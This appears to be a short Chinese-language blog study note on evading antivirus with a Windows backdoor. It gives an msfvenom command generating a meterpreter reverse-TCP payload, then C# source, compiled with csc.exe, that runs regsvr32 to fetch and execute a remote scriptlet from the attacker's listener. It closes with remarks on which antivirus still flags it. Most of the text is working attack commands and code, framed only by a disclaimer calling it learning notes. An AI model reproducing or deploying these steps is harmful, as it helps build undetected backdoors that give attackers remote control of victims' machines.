引用原文!!
注:本文技术非原创,转载请直接对原文转载,请不要对本文打赏等,本文为学习笔记,禁止由本文产生任何盈利行为。
需要(Framework),一般Windows环境都有,
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=5555 X > shell.exe
kali下生成后门文件。直接查杀,发现很多报毒。
原文要求生成一个sct文件,然后放到你的web服务的目录中,实现监听。
制作后门文件:
1、cmd必须给与管理员权限
2、cmd下,
cd C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\
C:\Windows\Microsoft.NET\Framework\v2.0.50727>csc /t:exe /out:aaa.exe regsvr32.cs
/t:exe意思是,输出exe文件。
/out:aaa.exe意思是,输出名字叫aaa的exe文件。
regsvr32.cs就是我们利用做免杀的c#文件。
https://github.com/pasahitz/regsvr32
regsvr32.cs这个文件需要单独编辑
using System;
using System.Runtime.InteropServices;
namespace Regsvr
{ public class CMD
{ [DllImport("msvcrt.dll")]
public static extern int system(string cmd);
public static void Main()
{ system("regsvr32 /s /n /u /i:http://监听者IP:监听的端口/你刚才生成的sct文件 scrobj.dll");
}}}
Malwarebytes这个杀毒软件好强悍。
